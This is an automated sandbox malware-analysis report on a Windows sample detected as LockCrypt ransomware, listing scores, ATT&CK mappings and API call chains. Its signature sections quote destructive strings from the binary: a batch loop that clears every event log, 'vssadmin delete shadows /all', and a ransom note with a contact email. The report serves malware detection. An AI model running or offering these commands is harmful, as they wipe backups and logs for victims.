Analysis Report module.8144.18ffc90c0.400000.dll

Overview

General Information

Joe Sandbox Version: 26.0.0
Analysis ID: 136638
Start date: 29.05.2019
Start time: 16:49:35
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 12m 37s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: module.8144.18ffc90c0.400000.dll (renamed file extension from dll to exe)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of new started processes analysed: 11
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • GSI enabled (VBA)
  • GSI enabled (Javascript)
  • GSI enabled (Java)
Analysis stop reason: Timeout
Detection: MAL
Classification: mal80.rans.evad.winEXE@2/1@0/0
EGA Information:
  • Successful, ratio: 100%
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 23
  • Number of non-executed functions: 93
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
Warnings:
  • Processes excluded from analysis (whitelisted): MpCmdRun.exe, sc.exe, dllhost.exe, WMIADAP.exe, conhost.exe, CompatTelRunner.exe, svchost.exe

Detection

Strategy: Threshold
Score: 80
Range: 0 - 100
Whitelisted: false
Detection: malicious

Confidence

Strategy: Threshold
Score: 5
Range: 0 - 5
Further Analysis Required?: false


Classification

Analysis Advice

Sample may offer command line options; run it with the 'Execute binary with arguments' cookbook (the command line switches may require additional characters such as "-", "/", or "--").
Sample monitors window changes (e.g. starting applications); analyze the sample with the 'Simulates keyboard and window changes' cookbook.
Sample tries to load a library that is not present or installed on the analysis machine; adding the library might reveal more behavior.



MITRE ATT&CK Matrix

Techniques flagged by this analysis carry the report's match count after their name; the remaining cells are the unflagged entries of the matrix.

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control
Valid Accounts | Windows Remote Management | Winlogon Helper DLL | Access Token Manipulation 1 | Disabling Security Tools 1 | Credential Dumping | System Time Discovery 1 | Application Deployment Software | Clipboard Data 1 | Data Encrypted 21 | Standard Cryptographic Protocol 1
Replication Through Removable Media | Service Execution | Port Monitors | Process Injection 1 | Software Packing 1 | Network Sniffing | Query Registry 1 | Remote Services | Data from Removable Media | Exfiltration Over Other Network Medium | Commonly Used Port 1
Drive-by Compromise | Windows Management Instrumentation | Accessibility Features | Path Interception | Access Token Manipulation 1 | Input Capture | Process Discovery 2 | Windows Remote Management | Data from Network Shared Drive | Automated Exfiltration | Custom Cryptographic Protocol
Exploit Public-Facing Application | Scheduled Task | System Firmware | DLL Search Order Hijacking | Process Injection 1 | Credentials in Files | Application Window Discovery 1 | Logon Scripts | Input Capture | Data Encrypted | Multiband Communication
Spearphishing Link | Command-Line Interface | Shortcut Modification | File System Permissions Weakness | Deobfuscate/Decode Files or Information 1 | Account Manipulation | Account Discovery 1 | Shared Webroot | Data Staged | Scheduled Transfer | Standard Cryptographic Protocol
Spearphishing Attachment | Graphical User Interface | Modify Existing Service | New Service | File Deletion 1 | Brute Force | System Owner/User Discovery 1 | Third-party Software | Screen Capture | Data Transfer Size Limits | Commonly Used Port
Spearphishing via Service | Scripting | Path Interception | Scheduled Task | Obfuscated Files or Information 2 | Two-Factor Authentication Interception | Security Software Discovery 21 | Pass the Hash | Email Collection | Exfiltration Over Command and Control Channel | Uncommonly Used Port
Supply Chain Compromise | Third-party Software | Logon Scripts | Process Injection | DLL Side-Loading 1 | Bash History | File and Directory Discovery 1 | Remote Desktop Protocol | Clipboard Data | Exfiltration Over Alternative Protocol | Standard Application Layer Protocol
Trusted Relationship | Rundll32 | DLL Search Order Hijacking | Service Registry Permissions Weakness | Process Injection | Input Prompt | System Information Discovery 13 | Windows Admin Shares | Automated Collection | Exfiltration Over Physical Medium | Multilayer Encryption

Signature Overview

AV Detection:

Antivirus or Machine Learning detection for sample
Source: module.8144.18ffc90c0.400000.exe | Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 0.0.module.8144.18ffc90c0.400000.exe.400000.0.unpack | Joe Sandbox ML: detected
Source: 0.1.module.8144.18ffc90c0.400000.exe.400000.0.unpack | Joe Sandbox ML: detected
Source: 0.2.module.8144.18ffc90c0.400000.exe.400000.0.unpack | Joe Sandbox ML: detected

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exe | Code function: 0_2_00401063 CryptImportKey,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,0_2_00401063
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exe | Code function: 0_2_00401000 EntryPoint,CryptAcquireContextA,lstrcpyW,lstrlenW,lstrcatW,GetFileAttributesW,CreateFileW,WriteFile,CloseHandle,SetFileAttributesW,GlobalFree,0_2_00401000
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exe | Code function: 0_2_004017A2 GetModuleFileNameA,lstrcmpiA,RegOpenKeyExA,lstrlenA,RegSetValueExA,lstrlenA,RegSetValueExA,RegCloseKey,CopyFileA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,CryptAcquireContextA,GetLastError,GetEnvironmentVariableA,ShellExecuteA,Sleep,CryptAcquireContextA,CryptGenKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CryptAcquireContextA,CryptImportKey,CryptEncrypt,CryptEncrypt,CryptDestroyKey,KiUserExceptionDispatcher,CryptReleaseContext,RegSetValueExA,RegSetValueExA,RegCloseKey,RtlZeroMemory,RegOpenKeyExA,RegSetValueExA,RegSetValueExA,RegSetValueExA,RegCloseKey,CryptAcquireContextA,CryptImportKey,GetSystemTimeAsFileTime,FileTimeToSystemTime,GetDateFormatA,lstrlenA,MultiByteToWideChar,lstrcatA,RegCreateKeyA,lstrcatA,lstrcatA,lstrlenA,RegSetValueExA,RegCloseKey,SHChangeNotify,GetEnvironmentVariableA,ShellExecuteA,GlobalFree,SetErrorMode,Sleep,Sleep,ShellExecuteA,CreateFileA,WriteFile,CloseHandle,ShellExecuteA,0_2_004017A2
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exe | Code function: 0_2_0040128D MoveFileW,CreateFileW,MoveFileW,Sleep,CreateFileMappingA,CloseHandle,CryptAcquireContextA,CloseHandle,CryptGenKey,CryptReleaseContext,CryptExportKey,CryptDestroyKey,MapViewOfFile,CryptEncrypt,CryptEncrypt,UnmapViewOfFile,CloseHandle,CryptDestroyKey,CryptReleaseContext,SetFilePointerEx,WriteFile,WriteFile,CloseHandle,SetFileAttributesW,0_2_0040128D
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exe | Code function: 0_2_0040191C CryptGenKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CryptAcquireContextA,CryptImportKey,CryptEncrypt,CryptEncrypt,CryptDestroyKey,KiUserExceptionDispatcher,CryptReleaseContext,RegSetValueExA,RegSetValueExA,RegCloseKey,RtlZeroMemory,RegOpenKeyExA,RegSetValueExA,RegSetValueExA,RegSetValueExA,RegCloseKey,CryptAcquireContextA,CryptImportKey,GetSystemTimeAsFileTime,FileTimeToSystemTime,GetDateFormatA,lstrlenA,MultiByteToWideChar,lstrcatA,RegCreateKeyA,lstrcatA,lstrcatA,lstrlenA,RegSetValueExA,RegCloseKey,SHChangeNotify,GetEnvironmentVariableA,ShellExecuteA,GlobalFree,SetErrorMode,Sleep,Sleep,ShellExecuteA,CreateFileA,WriteFile,CloseHandle,ShellExecuteA,0_2_0040191C
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exe | Code function: 0_1_00401063 CryptImportKey,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,0_1_00401063
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exe | Code function: 0_1_00401000 EntryPoint,CryptAcquireContextA,lstrcpyW,lstrlenW,lstrcatW,GetFileAttributesW,CreateFileW,WriteFile,CloseHandle,SetFileAttributesW,GlobalFree,0_1_00401000
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exe | Code function: 0_1_004017A2 GetModuleFileNameA,lstrcmpiA,RegOpenKeyExA,lstrlenA,RegSetValueExA,lstrlenA,RegSetValueExA,RegCloseKey,CopyFileA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,CryptAcquireContextA,GetLastError,GetEnvironmentVariableA,ShellExecuteA,Sleep,CryptAcquireContextA,CryptGenKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CryptAcquireContextA,CryptImportKey,CryptEncrypt,CryptEncrypt,CryptDestroyKey,KiUserExceptionDispatcher,CryptReleaseContext,RegSetValueExA,RegSetValueExA,RegCloseKey,RtlZeroMemory,RegOpenKeyExA,RegSetValueExA,RegSetValueExA,RegSetValueExA,RegCloseKey,CryptAcquireContextA,CryptImportKey,GetSystemTimeAsFileTime,FileTimeToSystemTime,GetDateFormatA,lstrlenA,MultiByteToWideChar,lstrcatA,RegCreateKeyA,lstrcatA,lstrcatA,lstrlenA,RegSetValueExA,RegCloseKey,SHChangeNotify,GetEnvironmentVariableA,ShellExecuteA,GlobalFree,SetErrorMode,Sleep,Sleep,ShellExecuteA,CreateFileA,WriteFile,CloseHandle,ShellExecuteA,0_1_004017A2
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exe | Code function: 0_1_0040128D MoveFileW,CreateFileW,MoveFileW,Sleep,CreateFileMappingA,CloseHandle,CryptAcquireContextA,CloseHandle,CryptGenKey,CryptReleaseContext,CryptExportKey,CryptDestroyKey,MapViewOfFile,CryptEncrypt,CryptEncrypt,UnmapViewOfFile,CloseHandle,CryptDestroyKey,CryptReleaseContext,SetFilePointerEx,WriteFile,WriteFile,CloseHandle,SetFileAttributesW,0_1_0040128D
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exe | Code function: 0_1_0040191C CryptGenKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CryptAcquireContextA,CryptImportKey,CryptEncrypt,CryptEncrypt,CryptDestroyKey,KiUserExceptionDispatcher,CryptReleaseContext,RegSetValueExA,RegSetValueExA,RegCloseKey,RtlZeroMemory,RegOpenKeyExA,RegSetValueExA,RegSetValueExA,RegSetValueExA,RegCloseKey,CryptAcquireContextA,CryptImportKey,GetSystemTimeAsFileTime,FileTimeToSystemTime,GetDateFormatA,lstrlenA,MultiByteToWideChar,lstrcatA,RegCreateKeyA,lstrcatA,lstrcatA,lstrlenA,RegSetValueExA,RegCloseKey,SHChangeNotify,GetEnvironmentVariableA,ShellExecuteA,GlobalFree,SetErrorMode,Sleep,Sleep,ShellExecuteA,CreateFileA,WriteFile,CloseHandle,ShellExecuteA,0_1_0040191C

Spreading:

Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exe | Code function: 0_2_004014CC FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,lstrcatW,lstrlenW,lstrcatW,lstrcatW,GlobalMemoryStatus,Sleep,CreateThread,CloseHandle,lstrcmpiW,lstrlenW,lstrcmpiW,lstrcatW,lstrlenW,lstrcatW,lstrcatW,lstrcatW,SetFileAttributesW,FindNextFileW,FindClose,GlobalFree,0_2_004014CC
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exe | Code function: 0_1_004014CC FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,lstrcatW,lstrlenW,lstrcatW,lstrcatW,GlobalMemoryStatus,Sleep,CreateThread,CloseHandle,lstrcmpiW,lstrlenW,lstrcmpiW,lstrcatW,lstrlenW,lstrcatW,lstrcatW,lstrcatW,SetFileAttributesW,FindNextFileW,FindClose,GlobalFree,0_1_004014CC
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exe | Code function: 9_2_00E9A394 memset,FindFirstFileW,memset,PathRemoveFileSpecW,WerRegisterFile,FindNextFileW,FindClose,9_2_00E9A394
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exe | Code function: 9_2_00E95DAE FindFirstFileW,9_2_00E95DAE
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exe | Code function: 9_1_00E9A394 memset,FindFirstFileW,memset,PathRemoveFileSpecW,WerRegisterFile,FindNextFileW,FindClose,9_1_00E9A394
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exe | Code function: 9_1_00E95DAE FindFirstFileW,9_1_00E95DAE

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to read data from the clipboard
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exe | Code function: 9_2_00E9765E OpenClipboard,9_2_00E9765E

Spam, unwanted Advertisements and Ransom Demands:

Detected LockCrypt Ransomware
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exe | Code function: GetModuleFileNameA,lstrcmpiA,RegOpenKeyExA,lstrlenA,RegSetValueExA,lstrlenA,RegSetValueExA,RegCloseKey,CopyFileA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,CryptAcquireContextA,GetLastError,GetEnvironmentVariableA,ShellExecuteA,Sleep,CryptAcquireContextA,CryptGenKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CryptAcquireContextA,CryptImportKey,CryptEncrypt,CryptEncrypt,CryptDestroyKey,KiUserExceptionDispatcher,CryptReleaseContext,RegSetValueExA,RegSetValueExA,RegCloseKey,RtlZeroMemory,RegOpenKeyExA,RegSetValueExA,RegSetValueExA,RegSetValueExA,RegCloseKey,CryptAcquireContextA,CryptImportKey,GetSystemTimeAsFileTime,FileTimeToSystemTime,GetDateFormatA,lstrlenA,MultiByteToWideChar,lstrcatA,RegCreateKeyA,lstrcatA,lstrcatA,lstrlenA,RegSetValueExA,RegCloseKey,SHChangeNotify,GetEnvironmentVariableA,ShellExecuteA,GlobalFree,SetErrorMode,Sleep,Sleep,ShellExecuteA,CreateFileA,WriteFile,CloseHandle,ShellExecuteA,0_1_004017A2
Contains functionality to clear event logs
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exe | Code function: @echo offfor /F "tokens=*" %%G in ('wevtutil.exe el') DO (call:r "%%G")goto End:rwevtutil.exe cl %1goto :eof:Endrd /s /q %systemdrive%\$RECYCLE.BINdel %00_1_004017A2
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exe | Code function: @echo offfor /F "tokens=*" %%G in ('wevtutil.exe el') DO (call:r "%%G")goto End:rwevtutil.exe cl %1goto :eof:Endrd /s /q %systemdrive%\$RECYCLE.BINdel %00_1_0040191C
Contains functionality to encrypt and move a file in one function
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exe | Code function: 0_2_0040128D MoveFileW,CreateFileW,MoveFileW,Sleep,CreateFileMappingA,CloseHandle,CryptAcquireContextA,CloseHandle,CryptGenKey,CryptReleaseContext,CryptExportKey,CryptDestroyKey,MapViewOfFile,CryptEncrypt,CryptEncrypt,UnmapViewOfFile,CloseHandle,CryptDestroyKey,CryptReleaseContext,SetFilePointerEx,WriteFile,WriteFile,CloseHandle,SetFileAttributesW,0_2_0040128D
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exe | Code function: 0_1_0040128D MoveFileW,CreateFileW,MoveFileW,Sleep,CreateFileMappingA,CloseHandle,CryptAcquireContextA,CloseHandle,CryptGenKey,CryptReleaseContext,CryptExportKey,CryptDestroyKey,MapViewOfFile,CryptEncrypt,CryptEncrypt,UnmapViewOfFile,CloseHandle,CryptDestroyKey,CryptReleaseContext,SetFilePointerEx,WriteFile,WriteFile,CloseHandle,SetFileAttributesW,0_1_0040128D
Deletes shadow drive data (may be related to ransomware)
Source: module.8144.18ffc90c0.400000.exe | Binary or memory string: /c vssadmin delete shadows /all
Source: module.8144.18ffc90c0.400000.exe, 00000000.00000000.593186365.0000000000403000.00000008.sdmp | Binary or memory string: del %0/c vssadmin delete shadows /all/c Regsvr32 /s Rsaenh.dllABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+-openSOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\SOFTWARE\Microsoft\Windows\CurrentVersion\DateTime\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PromptOnSecureDesktopEnableLUAConsentPromptBehaviorAdminSeDebugPrivilegeSeBackupPrivilegeSeRestorePrivilegeunlock"c:\Decoding help.hta"searchfilesC:\windows\searchfiles.exeC:\Windows\System32\mshta.exe
Source: module.8144.18ffc90c0.400000.exe | Binary or memory string: del %0/c vssadmin delete shadows /all/c Regsvr32 /s Rsaenh.dllABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+-openSOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\SOFTWARE\Microsoft\Windows\CurrentVersion\DateTime\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PromptOnSecureDesktopEnableLUAConsentPromptBehaviorAdminSeDebugPrivilegeSeBackupPrivilegeSeRestorePrivilegeunlock"c:\Decoding help.hta"searchfilesC:\windows\searchfiles.exeC:\Windows\System32\mshta.exe
Detected suspicious e-mail address in disassembly
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exe | Code function: 04,05,2019);</script></head><body style='text-align:center;background:#000'></br></br></br><h2 style='font-size:40px;color:#b00'>You are unlucky! The terrible virus has captured your files! For decoding please contact by email JonStokton@Protonmail.com or JonS0_1_004017A2
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exe | Code function: 04,05,2019);</script></head><body style='text-align:center;background:#000'></br></br></br><h2 style='font-size:40px;color:#b00'>You are unlucky! The terrible virus has captured your files! For decoding please contact by email JonStokton@Protonmail.com or JonS0_1_0040191C
Contains functionality to import cryptographic keys (often used in ransomware)
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exe | Code function: 0_2_00401063 CryptImportKey,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,0_2_00401063
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exe | Code function: 0_2_004017A2 GetModuleFileNameA,lstrcmpiA,RegOpenKeyExA,lstrlenA,RegSetValueExA,lstrlenA,RegSetValueExA,RegCloseKey,CopyFileA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,CryptAcquireContextA,GetLastError,GetEnvironmentVariableA,ShellExecuteA,Sleep,CryptAcquireContextA,CryptGenKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CryptAcquireContextA,CryptImportKey,CryptEncrypt,CryptEncrypt,CryptDestroyKey,KiUserExceptionDispatcher,CryptReleaseContext,RegSetValueExA,RegSetValueExA,RegCloseKey,RtlZeroMemory,RegOpenKeyExA,RegSetValueExA,RegSetValueExA,RegSetValueExA,RegCloseKey,CryptAcquireContextA,CryptImportKey,GetSystemTimeAsFileTime,FileTimeToSystemTime,GetDateFormatA,lstrlenA,MultiByteToWideChar,lstrcatA,RegCreateKeyA,lstrcatA,lstrcatA,lstrlenA,RegSetValueExA,RegCloseKey,SHChangeNotify,GetEnvironmentVariableA,ShellExecuteA,GlobalFree,SetErrorMode,Sleep,Sleep,ShellExecuteA,CreateFileA,WriteFile,CloseHandle,ShellExecuteA,0_2_004017A2
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exe | Code function: 0_2_0040191C CryptGenKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CryptAcquireContextA,CryptImportKey,CryptEncrypt,CryptEncrypt,CryptDestroyKey,KiUserExceptionDispatcher,CryptReleaseContext,RegSetValueExA,RegSetValueExA,RegCloseKey,RtlZeroMemory,RegOpenKeyExA,RegSetValueExA,RegSetValueExA,RegSetValueExA,RegCloseKey,CryptAcquireContextA,CryptImportKey,GetSystemTimeAsFileTime,FileTimeToSystemTime,GetDateFormatA,lstrlenA,MultiByteToWideChar,lstrcatA,RegCreateKeyA,lstrcatA,lstrcatA,lstrlenA,RegSetValueExA,RegCloseKey,SHChangeNotify,GetEnvironmentVariableA,ShellExecuteA,GlobalFree,SetErrorMode,Sleep,Sleep,ShellExecuteA,CreateFileA,WriteFile,CloseHandle,ShellExecuteA,0_2_0040191C
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exe | Code function: 0_1_00401063 CryptImportKey,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,0_1_00401063
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exe | Code function: 0_1_004017A2 GetModuleFileNameA,lstrcmpiA,RegOpenKeyExA,lstrlenA,RegSetValueExA,lstrlenA,RegSetValueExA,RegCloseKey,CopyFileA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,CryptAcquireContextA,GetLastError,GetEnvironmentVariableA,ShellExecuteA,Sleep,CryptAcquireContextA,CryptGenKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CryptAcquireContextA,CryptImportKey,CryptEncrypt,CryptEncrypt,CryptDestroyKey,KiUserExceptionDispatcher,CryptReleaseContext,RegSetValueExA,RegSetValueExA,RegCloseKey,RtlZeroMemory,RegOpenKeyExA,RegSetValueExA,RegSetValueExA,RegSetValueExA,RegCloseKey,CryptAcquireContextA,CryptImportKey,GetSystemTimeAsFileTime,FileTimeToSystemTime,GetDateFormatA,lstrlenA,MultiByteToWideChar,lstrcatA,RegCreateKeyA,lstrcatA,lstrcatA,lstrlenA,RegSetValueExA,RegCloseKey,SHChangeNotify,GetEnvironmentVariableA,ShellExecuteA,GlobalFree,SetErrorMode,Sleep,Sleep,ShellExecuteA,CreateFileA,WriteFile,CloseHandle,ShellExecuteA,0_1_004017A2
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exe | Code function: 0_1_0040191C CryptGenKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CryptAcquireContextA,CryptImportKey,CryptEncrypt,CryptEncrypt,CryptDestroyKey,KiUserExceptionDispatcher,CryptReleaseContext,RegSetValueExA,RegSetValueExA,RegCloseKey,RtlZeroMemory,RegOpenKeyExA,RegSetValueExA,RegSetValueExA,RegSetValueExA,RegCloseKey,CryptAcquireContextA,CryptImportKey,GetSystemTimeAsFileTime,FileTimeToSystemTime,GetDateFormatA,lstrlenA,MultiByteToWideChar,lstrcatA,RegCreateKeyA,lstrcatA,lstrcatA,lstrlenA,RegSetValueExA,RegCloseKey,SHChangeNotify,GetEnvironmentVariableA,ShellExecuteA,GlobalFree,SetErrorMode,Sleep,Sleep,ShellExecuteA,CreateFileA,WriteFile,CloseHandle,ShellExecuteA,0_1_0040191C

System Summary:

Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exe | Code function: String function: 00E94307 appears 246 times
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exe | Code function: String function: 00EA29EC appears 34 times
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exe | Code function: String function: 00E94E9D appears 328 times
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exe | Code function: String function: 00EA31CA appears 74 times
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exe | Code function: String function: 00EA3194 appears 116 times
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exe | Code function: String function: 00E91E20 appears 34 times
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exe | Code function: String function: 00E9851B appears 122 times
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exe | Code function: String function: 00EA2BBA appears 262 times
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exe | Code function: String function: 00EA3161 appears 176 times
Sample file name differs from the original file name gathered from version info
Source: module.8144.18ffc90c0.400000.exe, 00000000.00000002.2314748360.00000000004A0000.00000002.sdmp | Binary or memory string: OriginalFilenamempr.dll.muij% vs module.8144.18ffc90c0.400000.exe
Source: module.8144.18ffc90c0.400000.exe, 00000000.00000002.2316354878.0000000002600000.00000002.sdmp | Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs module.8144.18ffc90c0.400000.exe
Tries to load missing DLLs
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exe | Section loaded: wow64log.dll
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exe | Section loaded: wow64log.dll
Classification label
Source: classification engine | Classification label: mal80.rans.evad.winEXE@2/1@0/0
Contains functionality to adjust token privileges (e.g. debug / backup)
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exe | Code function: 0_2_00401DE7 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,FindCloseChangeNotification,0_2_00401DE7
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exe | Code function: 0_1_00401DE7 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,FindCloseChangeNotification,0_1_00401DE7
Contains functionality to check free disk space
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exe | Code function: 9_2_00E97025 GetDiskFreeSpaceExW,9_2_00E97025
Contains functionality to enumerate processes or threads
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exe | Code function: 0_2_00401D2D CreateToolhelp32Snapshot,Process32FirstW,lstrcmpiW,lstrlenW,GetCurrentProcessId,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,CloseHandle,Sleep,0_2_00401D2D
Contains functionality to instantiate COM classes
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exe | Code function: 9_2_00E921A2 CoCreateInstance,9_2_00E921A2
Creates files inside the user directory
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exe | File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\logs\Common\FileCoAuth-2019-5-29.2357.2916.1.aodl
Might use command line arguments
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exe | Command line argument: FileCoAuth 9_2_00E92E4B
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exe | Command line argument: FileCoAuth 9_1_00E92E4B
PE file has an executable .text section and no other executable section
Source: module.8144.18ffc90c0.400000.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Reads software policies
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Sample might require command line arguments (.Net)
Source: FileCoAuth.exe | String found in binary or memory: /installperfcounters
Spawns processes
Source: unknown | Process created: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exe 'C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exe'
Source: unknown | Process created: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exe C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exe -Embedding
Uses an in-process (OLE) Automation server
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
Binary contains paths to debug symbols
Source: Binary string: FileCoAuth.pdb | source: FileCoAuth.exe, 00000009.00000000.2084517723.0000000000EA6000.00000002.sdmp
Source: Binary string: FileCoAuth.pdbDD | source: FileCoAuth.exe, 00000009.00000000.2084517723.0000000000EA6000.00000002.sdmp

Data Obfuscation:

PE file contains an invalid checksum
Source: module.8144.18ffc90c0.400000.exe | Static PE information: real checksum: 0x3f67 should be: 0xa6a9
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exe | Code function: 9_2_00EA313E push ecx; ret 9_2_00EA3151
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exe | Code function: 9_2_00EA3265 push ecx; ret 9_2_00EA3278
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exe | Code function: 9_1_00EA313E push ecx; ret 9_1_00EA3151
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exe | Code function: 9_1_00EA3265 push ecx; ret 9_1_00EA3278

Malware Analysis System Evasion:

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exe | Code function: 0_2_00401D2D CreateToolhelp32Snapshot,Process32FirstW,lstrcmpiW,lstrlenW,GetCurrentProcessId,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,CloseHandle,Sleep,0_2_00401D2D
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exe | Window / User API: threadDelayed 4593
